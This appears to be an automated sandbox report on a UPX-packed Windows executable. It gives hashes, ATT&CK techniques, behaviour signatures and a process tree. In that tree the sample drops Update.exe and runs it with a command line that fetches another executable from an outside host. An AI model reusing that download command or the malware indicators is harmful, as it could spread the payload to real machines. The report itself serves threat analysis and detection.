db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec

General

Target

db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
Size

5.1MB
MD5

abe375968fe70ae9e888afebad4a6c2b
SHA1

88c0d4fef42b66e43daa9673d960f397f5e197ab
SHA256

db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec
SHA512

b0529eb277cd850a131f01001750cbda4beadb3693780e12ec8f5c2ca06c6c62cbf8fa97d1cb7ade063929109b486ae892ba59b2fd33499627c7ddf9793eeeb3
SSDEEP

98304:r6ntlkzALq+xRTFsPBxElbeWOZYeXmd/nyVVT3DjQtvDmpG913swwmJGancjNSxJ:untlkzALq+xRTFsPBxElbeWOZYeXmd/Z

Score

8^/10

upx

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe

Executes dropped EXE 1 IoCs

pid	Process
3616	Update.exe

UPX packed file 27 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2868-1-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-3-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-4-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-5-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-6-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-7-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-9-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-11-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-13-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-15-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-17-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-19-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-21-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-23-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-25-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-27-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-29-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-31-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-33-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-35-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-37-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-39-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-41-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-43-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-45-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-47-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral2/memory/2868-51-0x0000000010000000-0x000000001003E000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
3616	Update.exe
3616	Update.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 3616	2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe	89
PID 2868 wrote to memory of 3616	2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe	89
PID 2868 wrote to memory of 3616	2868	db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe	89

C:\Users\Admin\AppData\Local\Temp\db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
"C:\Users\Admin\AppData\Local\Temp\db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Users\Admin\AppData\Local\Temp\Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Update.exe" 2 http://a.tmvhoro.cn/ud/ftdk1.5.exe C:\Users\Admin\AppData\Local\Temp\ %7C%7C%7C%7C%CC%E1%CA%BE%A3%BA%C8%E7%D2%BB%D6%B1%CC%E1%CA%BE%B8%FC%D0%C2%A3%AC%CE%DE%B7%A8%B5%C7%C2%BC%B5%C4%A3%AC%C7%EB%BD%E2%D1%B9%D7%EE%CF%C8%CF%C2%D4%D8%B5%C4%CE%C4%BC%FE%BA%F3%A3%AC%B2%A2%C9%BE%B3%FD%A3%BAUpdate.exe+%A3%AC%CE%C4%BC%FE%BA%F3%D6%D8%D0%C2%B4%F2%BF%AA%C8%ED%BC%FE%A3%AC%CD%EA%B3%C9%B8%FC%D0%C2%BA%F3%A3%AC%C8%E7%BB%B9%D2%BB%D6%B1%CC%E1%CA%BE%B8%FC%D0%C2%A3%AC%C7%EB%B7%B4%C0%A1bug %B7%B9%CD%C5%C9%CF%BB%F5%BE%AB%C1%E9.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Update.exe

Filesize
1.1MB

MD5
a0f316f53b3f4e09bfc9157f2773613a

SHA1
ba6e1031e025e85184681b5b7601e7ad343e5845

SHA256
4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

SHA512
9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Update.exe

Filesize
1.1MB

MD5
a0f316f53b3f4e09bfc9157f2773613a

SHA1
ba6e1031e025e85184681b5b7601e7ad343e5845

SHA256
4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

SHA512
9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Update.exe

Filesize
1.1MB

MD5
a0f316f53b3f4e09bfc9157f2773613a

SHA1
ba6e1031e025e85184681b5b7601e7ad343e5845

SHA256
4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

SHA512
9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

Download Submit
memory/2868-27-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-3-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-6-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-7-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-9-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-11-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-33-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-15-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-17-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-19-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-21-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-23-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-25-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-0-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/2868-81-0x0000000002990000-0x0000000002991000-memory.dmp

Filesize
4KB

Download
memory/2868-5-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-13-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-35-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-37-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-39-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-41-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-43-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-45-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-47-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-49-0x0000000002990000-0x0000000002991000-memory.dmp

Filesize
4KB

Download
memory/2868-48-0x0000000002970000-0x0000000002971000-memory.dmp

Filesize
4KB

Download
memory/2868-50-0x0000000002980000-0x0000000002981000-memory.dmp

Filesize
4KB

Download
memory/2868-51-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-4-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-31-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-1-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2868-29-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download

Analysis

Sharing